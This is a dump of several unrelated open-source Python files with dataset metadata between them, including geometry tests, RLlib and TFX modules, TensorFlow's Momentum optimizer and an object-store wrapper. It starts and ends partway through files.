missing_values = x.isnull().sum() / len(x)
missing_drop_cols = list(missing_values[missing_values > self.perc].keys())
if "isFraud" in missing_drop_cols:
missing_drop_cols.remove("isFraud")
self.dropped_cols = missing_drop_cols
duplicate_drop_cols = [col for col in x.columns if
x[col].value_counts(dropna=False, normalize=True).values[0] > self.perc_dup]
if "isFraud" in duplicate_drop_cols:
duplicate_drop_cols.remove("isFraud")
self.dropped_cols.extend(duplicate_drop_cols)
if self.verbose:
print(f"Summarize: {len(missing_drop_cols)} columns have missing value(%) > {self.perc}")
print(f"Summarize: {len(duplicate_drop_cols)} columns have duplicate value(%) > {self.perc_dup}")
return self
def transform(self, x):
return x.drop(self.dropped_cols, axis=1) | 33.179245 | 122 | 0.579471 |
4a28081b8e8d2b7841d36bfcb59f0867aa0d58c5 | 2,583 | py | Python | geometry_analysis/tests/test_geometry_analysis.py | HanboHong/geometry_analysis | 4c73fb9119b8a38d149ce022f2425c30afff2464 | [
"BSD-3-Clause"
] | null | null | null | geometry_analysis/tests/test_geometry_analysis.py | HanboHong/geometry_analysis | 4c73fb9119b8a38d149ce022f2425c30afff2464 | [
"BSD-3-Clause"
] | null | null | null | geometry_analysis/tests/test_geometry_analysis.py | HanboHong/geometry_analysis | 4c73fb9119b8a38d149ce022f2425c30afff2464 | [
"BSD-3-Clause"
] | null | null | null | """
Unit and regression test for the geometry_analysis package.
"""
# Import package, test suite, and other packages as needed
import geometry_analysis
import pytest
import sys
import numpy as np
def test_geometry_analysis_imported():
"""Sample test, will always pass so long as import statement worked"""
assert "geometry_analysis" in sys.modules
def test_calculate_distance():
"""Test the calculate_distance function"""
r1 = np.array([0,0,-1])
r2 = np.array([0,1,0])
expected_distance = np.sqrt(2)
calculated_distance = geometry_analysis.calculate_distance(r1, r2)
assert expected_distance == calculated_distance
def test_calculate_angle_90():
"""Test the calculate_angle function"""
A = np.array([1,0,0])
B = np.array([0,0,0])
C = np.array([0,1,0])
expected_angle = 90
calculated_angle = geometry_analysis.calculate_angle(A,B,C, True)
assert expected_angle == calculated_angle
def test_calculate_angle_60():
"""Test another value of the calculate_angle function"""
A = np.array([0,0,-1])
B = np.array([0,1,0])
C = np.array([1,0,0])
expected_value = 60
calculated_value = geometry_analysis.calculate_angle(A,B,C, True)
assert np.isclose(expected_value, calculated_value)
@pytest.mark.parametrize("p1, p2, p3, expected_angle", [
(np.array([1,0,0]), np.array([0,0,0]), np.array([0,1,0]), 90),
(np.array([0,0,-1]), np.array([0,1,0]), np.array([1,0,0]), 60),
])
def test_calculate_angle(p1, p2, p3, expected_angle):
calculated_angle = geometry_analysis.calculate_angle(p1, p2, p3, True)
assert np.isclose(expected_angle, calculated_angle)
@pytest.fixture()
def water_molecule():
name = "water"
symbols = ["H", "O", "H"]
coordinates = np.array([[2,0,0], [0,0,0], [-2,0,0]])
water = geometry_analysis.Molecule(name, symbols, coordinates)
return water
def test_create_failure():
name = 25
symbols = ["H", "O", "H"]
coordinates = np.zeros([3,3])
with pytest.raises(TypeError):
water = geometry_analysis.Molecule(name, symbols, coordinates)
def test_molecule_set_coordinates(water_molecule):
"""Test that bond list is rebuilt when we reset coordinates."""
num_bonds = len(water_molecule.bonds)
assert num_bonds == 2
new_coordinates = np.array([[999,0,0], [0,0,0], [-2,0,0]])
water_molecule.coordinates = new_coordinates
new_bonds = len(water_molecule.bonds)
assert new_bonds == 1
assert np.array_equal(new_coordinates, water_molecule.coordinates)
| 24.140187 | 74 | 0.675184 |
4a2808410dd100a720d3100d0c2d8cb7a3588835 | 2,023 | py | Python | rllib/agents/pg/pg_tf_policy.py | daobook/ray | af9f1ef4dc160e0671206556b387f8017f3c3930 | [
"Apache-2.0"
] | 33 | 2020-05-27T14:25:24.000Z | 2022-03-22T06:11:30.000Z | rllib/agents/pg/pg_tf_policy.py | daobook/ray | af9f1ef4dc160e0671206556b387f8017f3c3930 | [
"Apache-2.0"
] | 125 | 2018-01-31T06:57:41.000Z | 2022-03-26T07:07:14.000Z | rllib/agents/pg/pg_tf_policy.py | daobook/ray | af9f1ef4dc160e0671206556b387f8017f3c3930 | [
"Apache-2.0"
] | 5 | 2020-08-06T15:53:07.000Z | 2022-02-09T03:31:31.000Z | """
TensorFlow policy class used for PG.
"""
from typing import List, Type, Union
import ray
from ray.rllib.agents.pg.utils import post_process_advantages
from ray.rllib.evaluation.postprocessing import Postprocessing
from ray.rllib.models.action_dist import ActionDistribution
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.policy import Policy
from ray.rllib.policy.tf_policy_template import build_tf_policy
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.framework import try_import_tf
from ray.rllib.utils.typing import TensorType
tf1, tf, tfv = try_import_tf()
def pg_tf_loss(
policy: Policy, model: ModelV2, dist_class: Type[ActionDistribution],
train_batch: SampleBatch) -> Union[TensorType, List[TensorType]]:
"""The basic policy gradients loss function.
Args:
policy (Policy): The Policy to calculate the loss for.
model (ModelV2): The Model to calculate the loss for.
        dist_class (Type[ActionDistribution]): The action distr. class.
train_batch (SampleBatch): The training data.
Returns:
Union[TensorType, List[TensorType]]: A single loss tensor or a list
of loss tensors.
"""
# Pass the training data through our model to get distribution parameters.
dist_inputs, _ = model(train_batch)
# Create an action distribution object.
action_dist = dist_class(dist_inputs, model)
# Calculate the vanilla PG loss based on:
# L = -E[ log(pi(a|s)) * A]
return -tf.reduce_mean(
action_dist.logp(train_batch[SampleBatch.ACTIONS]) * tf.cast(
train_batch[Postprocessing.ADVANTAGES], dtype=tf.float32))
# Build a child class of `DynamicTFPolicy`, given the extra options:
# - trajectory post-processing function (to calculate advantages)
# - PG loss function
PGTFPolicy = build_tf_policy(
name="PGTFPolicy",
get_default_config=lambda: ray.rllib.agents.pg.DEFAULT_CONFIG,
postprocess_fn=post_process_advantages,
loss_fn=pg_tf_loss)
| 35.491228 | 78 | 0.739496 |
4a280a2b21daa731de9f5b32caf41b88135ec9b4 | 2,962 | py | Python | tfx/components/infra_validator/model_server_runners/factory.py | BioGeek/tfx | 3d30ae8a1e2f33367c592ca86562cf555193cfb6 | [
"Apache-2.0"
] | 1 | 2020-11-24T16:59:37.000Z | 2020-11-24T16:59:37.000Z | tfx/components/infra_validator/model_server_runners/factory.py | BioGeek/tfx | 3d30ae8a1e2f33367c592ca86562cf555193cfb6 | [
"Apache-2.0"
] | null | null | null | tfx/components/infra_validator/model_server_runners/factory.py | BioGeek/tfx | 3d30ae8a1e2f33367c592ca86562cf555193cfb6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Factory for making model server runners."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Iterable
from tfx.components.infra_validator.model_server_clients import factory
from tfx.components.infra_validator.model_server_runners import base_runner
from tfx.components.infra_validator.model_server_runners import local_docker_runner
from tfx.proto import infra_validator_pb2
from tfx.types import standard_artifacts
def create_model_server_runners(
model: standard_artifacts.Model,
serving_spec: infra_validator_pb2.ServingSpec
) -> Iterable[base_runner.BaseModelServerRunner]:
"""Create model server runners based on given model and serving spec.
  In ServingSpec you can specify multiple versions for validation on a single
  image. In such a case it returns multiple model server runners, one for each
(image, version) pair.
Args:
model: A model artifact whose uri contains the path to the servable model.
serving_spec: A ServingSpec configuration.
Returns:
An iterable of `BaseModelServerRunner`.
"""
platform_kind = serving_spec.WhichOneof('serving_platform')
if platform_kind == 'local_docker':
return _create_local_docker_runners(model, serving_spec)
else:
raise NotImplementedError('{} platform is not yet supported'
.format(platform_kind))
def _create_local_docker_runners(
model: standard_artifacts.Model,
serving_spec: infra_validator_pb2.ServingSpec,
) -> Iterable[base_runner.BaseModelServerRunner]:
client_factory = factory.make_client_factory(model, serving_spec)
for image_uri in _build_docker_uris(serving_spec):
yield local_docker_runner.LocalDockerModelServerRunner(
model=model,
image_uri=image_uri,
config=serving_spec.local_docker,
client_factory=client_factory)
def _build_docker_uris(serving_spec):
binary_kind = serving_spec.WhichOneof('serving_binary')
if binary_kind == 'tensorflow_serving':
for tag in serving_spec.tensorflow_serving.tags:
yield 'tensorflow/serving:{}'.format(tag)
for digest in serving_spec.tensorflow_serving.digests:
yield 'tensorflow/serving@{}'.format(digest)
else:
raise NotImplementedError('{} binary is not yet supported'
.format(binary_kind))
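# --- Added illustrative sketch (not part of the original module); the proto field
# usage below is an assumption based on the fields referenced above.
#
#   spec = infra_validator_pb2.ServingSpec()
#   spec.local_docker.SetInParent()
#   spec.tensorflow_serving.tags.append('latest')
#   runners = list(create_model_server_runners(model, spec))   # one runner per tag/digest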
| 37.974359 | 83 | 0.770088 |
4a280b93ccf38ea88b851d49a2d3f16716ca7ac4 | 302 | py | Python | odooku_data/serialization/fields.py | odooku/odooku-data | c9f47eb04d7f04cbd2e204779a7023e9e59ec9ab | [
"Apache-2.0"
] | null | null | null | odooku_data/serialization/fields.py | odooku/odooku-data | c9f47eb04d7f04cbd2e204779a7023e9e59ec9ab | [
"Apache-2.0"
] | null | null | null | odooku_data/serialization/fields.py | odooku/odooku-data | c9f47eb04d7f04cbd2e204779a7023e9e59ec9ab | [
"Apache-2.0"
] | 1 | 2020-10-06T12:00:02.000Z | 2020-10-06T12:00:02.000Z | from odooku_data.serialization.base import BaseFieldSerializer
class FieldSerializer(BaseFieldSerializer):
def serialize(self, record, context):
return record.read([self.field_name])[0][self.field_name]
def deserialize(self, values, context):
return values[self.field_name]
| 27.454545 | 65 | 0.751656 |
4a280cfd33a4222a136048f49d7199d6ce60dbca | 7,401 | py | Python | mahiru/components/asset_store.py | SecConNet/proof_of_concept | 80f6b27ff6b97796803e554387ca2881a792be79 | [
"Apache-2.0"
] | 4 | 2021-03-26T09:17:51.000Z | 2021-05-17T10:31:59.000Z | mahiru/components/asset_store.py | SecConNet/proof_of_concept | 80f6b27ff6b97796803e554387ca2881a792be79 | [
"Apache-2.0"
] | 58 | 2020-03-02T10:02:51.000Z | 2021-07-09T09:23:49.000Z | mahiru/components/asset_store.py | SecConNet/proof_of_concept | 80f6b27ff6b97796803e554387ca2881a792be79 | [
"Apache-2.0"
] | null | null | null | """Storage and exchange of data and compute assets."""
from copy import copy
import logging
from pathlib import Path
from shutil import copyfile, move, rmtree
from tempfile import mkdtemp
from typing import Dict, Optional
from mahiru.definitions.assets import Asset, ComputeAsset, DataAsset
from mahiru.definitions.connections import ConnectionInfo, ConnectionRequest
from mahiru.definitions.identifier import Identifier
from mahiru.definitions.interfaces import IAssetStore, IDomainAdministrator
from mahiru.policy.evaluation import PermissionCalculator, PolicyEvaluator
logger = logging.getLogger(__name__)
class AssetStore(IAssetStore):
"""A simple store for assets."""
def __init__(
self, policy_evaluator: PolicyEvaluator,
domain_administrator: IDomainAdministrator,
image_dir: Optional[Path] = None) -> None:
"""Create a new empty AssetStore.
Args:
policy_evaluator: Policy evaluator to use for access
checks.
domain_administrator: Domain administrator to use for
serving assets over the network.
image_dir: Local directory to store image files in.
"""
self._policy_evaluator = policy_evaluator
self._domain_administrator = domain_administrator
self._permission_calculator = PermissionCalculator(policy_evaluator)
# TODO: lock this
self._assets = dict() # type: Dict[Identifier, Asset]
if image_dir is None:
# TODO: add mahiru prefix
image_dir = Path(mkdtemp())
self._image_dir = image_dir
# Requester per connection
self._connection_owners = dict() # type: Dict[str, Identifier]
def close(self) -> None:
"""Releases resources, call when done."""
rmtree(self._image_dir, ignore_errors=True)
def store(self, asset: Asset, move_image: bool = False) -> None:
"""Stores an asset.
Args:
asset: asset object to store
move_image: If the asset has an image and True is passed,
the image file will be moved rather than copied into
the store.
Raises:
KeyError: If there's already an asset with the asset id.
"""
if asset.id in self._assets:
raise KeyError(f'There is already an asset with id {id}')
# TODO: ordering, get file first then insert Asset object
self._assets[asset.id] = copy(asset)
if asset.image_location is not None:
src_path = Path(asset.image_location)
tgt_path = self._image_dir / f'{asset.id}.tar.gz'
if move_image:
move(str(src_path), str(tgt_path))
else:
copyfile(src_path, tgt_path)
self._assets[asset.id].image_location = str(tgt_path)
def store_image(
self, asset_id: Identifier, image_file: Path,
move_image: bool = False) -> None:
"""Stores an image for an already-stored asset.
Args:
asset_id: ID of the asset to add an image for.
            image_file: Path to the image file to store.
            move_image: Whether to move the input file rather than copy it.
Raises:
KeyError: If there's no asset with the given ID.
"""
if asset_id not in self._assets:
raise KeyError(f'Asset with id {asset_id} not found.')
asset = self._assets[asset_id]
tgt_path = self._image_dir / f'{asset_id}.tar.gz'
if move_image:
move(str(image_file), str(tgt_path))
else:
copyfile(image_file, tgt_path)
asset.image_location = str(tgt_path)
def retrieve(self, asset_id: Identifier, requester: Identifier) -> Asset:
"""Retrieves an asset.
Args:
asset_id: ID of the asset to retrieve.
requester: Name of the site making the request.
Return:
The asset object with asset_id.
Raises:
KeyError: If no asset with the given id is stored here.
"""
logger.info(f'{self}: servicing request from {requester} for data: '
f'{asset_id}')
self._check_request(asset_id, requester)
logger.info(f'{self}: Sending asset {asset_id} to {requester}')
return self._assets[asset_id]
def serve(
self, asset_id: Identifier, request: ConnectionRequest,
requester: Identifier) -> ConnectionInfo:
"""Serves an asset via a secure network connection.
Args:
asset_id: ID of the asset to serve.
request: Connection request describing the desired
connection.
requester: The site requesting this connection.
Return:
ConnectionInfo object for the connection.
Raises:
KeyError: If the asset was not found.
RuntimeError: If the requester does not have permission to
access this asset, or connections are disabled.
"""
logger.info(f'{self}: servicing request from {requester} for'
f' connection to {asset_id}')
self._check_request(asset_id, requester)
conn_info = self._domain_administrator.serve_asset(
self._assets[asset_id], request)
self._connection_owners[conn_info.conn_id] = requester
return conn_info
def stop_serving(self, conn_id: str, requester: Identifier) -> None:
"""Stop serving an asset and close the connection.
Args:
conn_id: Connection id previously returned by serve().
requester: The site requesting to stop.
Raises:
KeyError: If the connection was not found.
RuntimeError: If the requester does not have permission to
stop this connection.
"""
if conn_id not in self._connection_owners:
raise KeyError('Invalid connection id')
if self._connection_owners[conn_id] != requester:
raise RuntimeError('Permission denied')
self._domain_administrator.stop_serving_asset(conn_id)
del self._connection_owners[conn_id]
def _check_request(
self, asset_id: Identifier, requester: Identifier) -> None:
"""Check that a request for an asset is allowed.
Args:
asset_id: The asset being requested.
requester: The site requesting access to it.
Raises:
KeyError: If we don't have this asset.
RuntimeError: If the request is not allowed.
"""
if asset_id not in self._assets:
msg = (
f'{self}: Asset {asset_id} not found'
f' (requester = {requester}).')
logger.info(msg)
raise KeyError(msg)
asset = self._assets[asset_id]
if isinstance(asset, DataAsset):
perms = self._permission_calculator.calculate_permissions(
asset.metadata.job)
perm = perms[asset.metadata.item]
if isinstance(asset, ComputeAsset):
perm = self._policy_evaluator.permissions_for_asset(asset_id)
if not self._policy_evaluator.may_access(perm, requester):
raise RuntimeError(f'{self}: Security error, access denied'
                               f' for {requester} to {asset_id}')
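# --- Added illustrative sketch (not part of the original module). The collaborators
# (policy evaluator, domain administrator, assets, site Identifiers) come from
# elsewhere in Mahiru; shown only to indicate the intended call pattern.
#
#   store = AssetStore(policy_evaluator, domain_administrator)
#   store.store(asset, move_image=True)
#   retrieved = store.retrieve(asset.id, requester_site_id)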
| 36.458128 | 77 | 0.617619 |
4a280de6b716fd3569d0d2290eb06686641fd523 | 279 | py | Python | pirates/ai/HolidayManager.py | ksmit799/POTCO-PS | 520d38935ae8df4b452c733a82c94dddac01e275 | [
"Apache-2.0"
] | 8 | 2017-01-24T04:33:29.000Z | 2020-11-01T08:36:24.000Z | pirates/ai/HolidayManager.py | ksmit799/Pirates-Online-Remake | 520d38935ae8df4b452c733a82c94dddac01e275 | [
"Apache-2.0"
] | 1 | 2017-03-02T18:05:17.000Z | 2017-03-14T06:47:10.000Z | pirates/ai/HolidayManager.py | ksmit799/Pirates-Online-Remake | 520d38935ae8df4b452c733a82c94dddac01e275 | [
"Apache-2.0"
] | 11 | 2017-03-02T18:46:07.000Z | 2020-11-01T08:36:26.000Z | from direct.distributed import DistributedObject
from direct.directnotify import DirectNotifyGlobal
class HolidayManager(DistributedObject.DistributedObject):
notify = DirectNotifyGlobal.directNotify.newCategory('HolidayManager')
neverDisable = 1
def __init__(self):
pass | 31 | 71 | 0.845878 |
4a280e7c514abfa1c148c27212741ff85c839cf5 | 5,621 | py | Python | tensorflow/python/training/momentum.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 52 | 2018-11-12T06:39:35.000Z | 2022-03-08T05:31:27.000Z | tensorflow/python/training/momentum.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 2 | 2018-12-04T08:35:40.000Z | 2020-10-22T16:17:39.000Z | tensorflow/python/training/momentum.py | fraudies/tensorflow | a42423e302b71893bbd24aa896869941013c07fb | [
"Apache-2.0"
] | 17 | 2019-03-11T01:17:16.000Z | 2022-02-21T00:44:47.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Momentum for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import ops
from tensorflow.python.ops import math_ops
from tensorflow.python.training import optimizer
from tensorflow.python.training import training_ops
from tensorflow.python.util.tf_export import tf_export
@tf_export("train.MomentumOptimizer")
class MomentumOptimizer(optimizer.Optimizer):
"""Optimizer that implements the Momentum algorithm.
Computes (if `use_nesterov = False`):
```
accumulation = momentum * accumulation + gradient
variable -= learning_rate * accumulation
```
Note that in the dense version of this algorithm, `accumulation` is updated
and applied regardless of a gradient's value, whereas the sparse version (when
the gradient is an `IndexedSlices`, typically because of `tf.gather` or an
embedding) only updates variable slices and corresponding `accumulation` terms
when that part of the variable was used in the forward pass.
"""
def __init__(self, learning_rate, momentum,
use_locking=False, name="Momentum", use_nesterov=False):
"""Construct a new Momentum optimizer.
Args:
learning_rate: A `Tensor` or a floating point value. The learning rate.
momentum: A `Tensor` or a floating point value. The momentum.
use_locking: If `True` use locks for update operations.
name: Optional name prefix for the operations created when applying
gradients. Defaults to "Momentum".
use_nesterov: If `True` use Nesterov Momentum.
See [Sutskever et al., 2013](
http://jmlr.org/proceedings/papers/v28/sutskever13.pdf).
This implementation always computes gradients at the value of the
variable(s) passed to the optimizer. Using Nesterov Momentum makes the
variable(s) track the values called `theta_t + mu*v_t` in the paper.
This implementation is an approximation of the original formula, valid
for high values of momentum. It will compute the "adjusted gradient"
in NAG by assuming that the new gradient will be estimated by the
current average gradient plus the product of momentum and the change
in the average gradient.
@compatibility(eager)
When eager execution is enabled, `learning_rate` and `momentum` can each be
a callable that takes no arguments and returns the actual value to use. This
can be useful for changing these values across different invocations of
optimizer functions.
@end_compatibility
"""
super(MomentumOptimizer, self).__init__(use_locking, name)
self._learning_rate = learning_rate
self._momentum = momentum
self._use_nesterov = use_nesterov
def _create_slots(self, var_list):
for v in var_list:
self._zeros_slot(v, "momentum", self._name)
def _prepare(self):
learning_rate = self._learning_rate
if callable(learning_rate):
learning_rate = learning_rate()
self._learning_rate_tensor = ops.convert_to_tensor(learning_rate,
name="learning_rate")
momentum = self._momentum
if callable(momentum):
momentum = momentum()
self._momentum_tensor = ops.convert_to_tensor(momentum, name="momentum")
def _apply_dense(self, grad, var):
mom = self.get_slot(var, "momentum")
return training_ops.apply_momentum(
var, mom,
math_ops.cast(self._learning_rate_tensor, var.dtype.base_dtype),
grad,
math_ops.cast(self._momentum_tensor, var.dtype.base_dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov).op
def _resource_apply_dense(self, grad, var):
mom = self.get_slot(var, "momentum")
return training_ops.resource_apply_momentum(
var.handle, mom.handle,
math_ops.cast(self._learning_rate_tensor, grad.dtype.base_dtype),
grad,
math_ops.cast(self._momentum_tensor, grad.dtype.base_dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov)
def _apply_sparse(self, grad, var):
mom = self.get_slot(var, "momentum")
return training_ops.sparse_apply_momentum(
var, mom,
math_ops.cast(self._learning_rate_tensor, var.dtype.base_dtype),
grad.values, grad.indices,
math_ops.cast(self._momentum_tensor, var.dtype.base_dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov).op
def _resource_apply_sparse(self, grad, var, indices):
mom = self.get_slot(var, "momentum")
return training_ops.resource_sparse_apply_momentum(
var.handle, mom.handle,
math_ops.cast(self._learning_rate_tensor, grad.dtype),
grad, indices,
math_ops.cast(self._momentum_tensor, grad.dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov)
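# --- Added illustrative usage (not part of the original module). A minimal sketch;
# `loss` is a user-defined scalar tensor.
#
#   opt = MomentumOptimizer(learning_rate=0.01, momentum=0.9, use_nesterov=True)
#   train_op = opt.minimize(loss)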
| 41.947761 | 80 | 0.71304 |
4a2810299a52aa3370468a40f5e5e157e6faf395 | 946 | py | Python | test/integration/states/services/test_ecs.py | mattsb42/rhodes | 86d5c86fea1f069ce6f896d2cfea1ed6056392dc | [
"Apache-2.0"
] | 1 | 2019-11-18T07:34:36.000Z | 2019-11-18T07:34:36.000Z | test/integration/states/services/test_ecs.py | mattsb42/rhodes | 86d5c86fea1f069ce6f896d2cfea1ed6056392dc | [
"Apache-2.0"
] | 55 | 2019-10-18T05:32:34.000Z | 2020-01-10T07:54:04.000Z | test/integration/states/services/test_ecs.py | mattsb42/rhodes | 86d5c86fea1f069ce6f896d2cfea1ed6056392dc | [
"Apache-2.0"
] | null | null | null | """Integration tests for ``rhodes.states.services.ecs``."""
import pytest
from rhodes.states.services.ecs import AmazonEcs
from rhodes.structures import Parameters
from ...integration_test_utils import build_and_try_single_step_state_machine
pytestmark = [pytest.mark.integ]
def test_ecs_minimal():
step = AmazonEcs("test", TaskDefinition="bar")
build_and_try_single_step_state_machine(step)
def test_ecs_all_specials():
step = AmazonEcs(
"test",
Cluster="foo",
Group="bar",
LaunchType="baz",
NetworkConfiguration=Parameters(AwsvpcConfiguration=Parameters(AssignPublicIp="wat")),
Overrides=Parameters(ContainerOverrides=[dict(Cpu=3)]),
PlacementConstraints=[dict(Expression="foo", Type="bar")],
PlacementStrategy=[dict(Field="foo", Type="bar")],
PlatformVersion="foo",
TaskDefinition="bar",
)
build_and_try_single_step_state_machine(step)
| 30.516129 | 94 | 0.713531 |
4a28104bfe070c072906d4f65b49dd11bd935de5 | 3,297 | py | Python | Acquire/ObjectStore/_objstore.py | michellab/BioSimSpaceCloud | 456b146a2131565e354352872d3e75a08c3652d1 | [
"Apache-2.0"
] | 2 | 2019-02-15T16:04:19.000Z | 2019-02-19T15:42:27.000Z | Acquire/ObjectStore/_objstore.py | michellab/BioSimSpaceCloud | 456b146a2131565e354352872d3e75a08c3652d1 | [
"Apache-2.0"
] | null | null | null | Acquire/ObjectStore/_objstore.py | michellab/BioSimSpaceCloud | 456b146a2131565e354352872d3e75a08c3652d1 | [
"Apache-2.0"
] | null | null | null |
import io as _io
import datetime as _datetime
import uuid as _uuid
import json as _json
import os as _os
from ._errors import ObjectStoreError
__all__ = ["ObjectStore", "set_object_store_backend",
"use_testing_object_store_backend",
"use_oci_object_store_backend"]
_objstore_backend = None
def use_testing_object_store_backend(backend):
from ._testing_objstore import Testing_ObjectStore as _Testing_ObjectStore
set_object_store_backend(_Testing_ObjectStore)
return "%s/testing_objstore" % backend
def use_oci_object_store_backend():
from ._oci_objstore import OCI_ObjectStore as _OCI_ObjectStore
set_object_store_backend(_OCI_ObjectStore)
class ObjectStore:
@staticmethod
def get_object_as_file(bucket, key, filename):
return _objstore_backend.get_object_as_file(bucket, key, filename)
@staticmethod
def get_object(bucket, key):
return _objstore_backend.get_object(bucket, key)
@staticmethod
def get_string_object(bucket, key):
return _objstore_backend.get_string_object(bucket, key)
@staticmethod
def get_object_from_json(bucket, key):
return _objstore_backend.get_object_from_json(bucket, key)
@staticmethod
def get_all_object_names(bucket, prefix=None):
return _objstore_backend.get_all_object_names(bucket, prefix)
@staticmethod
def get_all_objects(bucket, prefix=None):
return _objstore_backend.get_all_objects(bucket, prefix)
@staticmethod
def get_all_strings(bucket, prefix=None):
return _objstore_backend.get_all_strings(bucket, prefix)
@staticmethod
def set_object(bucket, key, data):
_objstore_backend.set_object(bucket, key, data)
@staticmethod
def set_object_from_file(bucket, key, filename):
_objstore_backend.set_object_from_file(bucket, key, filename)
@staticmethod
def set_string_object(bucket, key, string_data):
_objstore_backend.set_string_object(bucket, key, string_data)
@staticmethod
def set_object_from_json(bucket, key, data):
_objstore_backend.set_object_from_json(bucket, key, data)
@staticmethod
def log(bucket, message, prefix="log"):
_objstore_backend.log(bucket, message, prefix)
@staticmethod
def delete_all_objects(bucket, prefix=None):
_objstore_backend.delete_all_objects(bucket, prefix)
@staticmethod
def get_log(bucket, log="log"):
_objstore_backend.get_log(bucket, log)
@staticmethod
def clear_log(bucket, log="log"):
_objstore_backend.clear_log(bucket, log)
@staticmethod
def delete_object(bucket, key):
_objstore_backend.delete_object(bucket, key)
@staticmethod
def clear_all_except(bucket, keys):
_objstore_backend.clear_all_except(bucket, keys)

def set_object_store_backend(backend):
    """Set the backend that is used to actually connect to
       the object store. This can only be set once in the program!
    """
    global _objstore_backend

    if backend == _objstore_backend:
        return

    if _objstore_backend is not None:
        raise ObjectStoreError("You cannot change the object store "
                               "backend once it has been already set!")

    _objstore_backend = backend
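
# ----------------------------------------------------------------------------
# Illustrative usage sketch.  This is an assumption-laden example rather than
# part of the module's API: it assumes the string returned by
# use_testing_object_store_backend() can be passed straight back in as the
# "bucket" handle of the testing backend, and that the testing backend stores
# objects under that local directory.
# ----------------------------------------------------------------------------
if __name__ == "__main__":
    # Install the file-based testing backend rooted at a scratch directory.
    bucket = use_testing_object_store_backend("/tmp/acquire_objstore_demo")

    # Write a small JSON document through the facade and read it back.
    ObjectStore.set_object_from_json(bucket, "demo/config", {"answer": 42})
    print(ObjectStore.get_object_from_json(bucket, "demo/config"))

    # List every object name stored under the "demo" prefix.
    print(ObjectStore.get_all_object_names(bucket, prefix="demo"))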
| 29.4375 | 78 | 0.729754 |
4a281063542312f7977712aaf6024b70832e60d0 | 1,398 | py | Python | stubs.min/System/Windows/Forms/__init___parts/UICuesEventArgs.py | denfromufa/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | ["MIT"] | 1 | 2017-07-07T11:15:45.000Z | 2017-07-07T11:15:45.000Z | stubs.min/System/Windows/Forms/__init___parts/UICuesEventArgs.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | ["MIT"] | null | null | null | stubs.min/System/Windows/Forms/__init___parts/UICuesEventArgs.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | ["MIT"] | null | null | null |
class UICuesEventArgs(EventArgs):
"""
Provides data for the System.Windows.Forms.Control.ChangeUICues event.
UICuesEventArgs(uicues: UICues)
"""
@staticmethod
def __new__(self,uicues):
""" __new__(cls: type,uicues: UICues) """
pass
Changed=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the bitwise combination of the System.Windows.Forms.UICues values.
Get: Changed(self: UICuesEventArgs) -> UICues
"""
ChangeFocus=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the state of the focus cues has changed.
Get: ChangeFocus(self: UICuesEventArgs) -> bool
"""
ChangeKeyboard=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the state of the keyboard cues has changed.
Get: ChangeKeyboard(self: UICuesEventArgs) -> bool
"""
ShowFocus=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether focus rectangles are shown after the change.
Get: ShowFocus(self: UICuesEventArgs) -> bool
"""
ShowKeyboard=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether keyboard cues are underlined after the change.
Get: ShowKeyboard(self: UICuesEventArgs) -> bool
"""
| 29.744681 | 86 | 0.709585 |
4a281132d92b229850ecfd1acf3883022a49f240 | 1,643 | py | Python | masakari/cmd/api.py | sampathP/openstack-masakari | 108d988165271b7bafd66d985ff1000537ef3183 | ["Apache-2.0"] | null | null | null | masakari/cmd/api.py | sampathP/openstack-masakari | 108d988165271b7bafd66d985ff1000537ef3183 | ["Apache-2.0"] | null | null | null | masakari/cmd/api.py | sampathP/openstack-masakari | 108d988165271b7bafd66d985ff1000537ef3183 | ["Apache-2.0"] | null | null | null |
# Copyright 2016 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starter script for Masakari API.
"""
import sys
from oslo_log import log as logging
import six
import masakari.conf
from masakari import config
from masakari import exception
from masakari.i18n import _LE
from masakari.i18n import _LW
from masakari import service
CONF = masakari.conf.CONF

def main():
    config.parse_args(sys.argv)
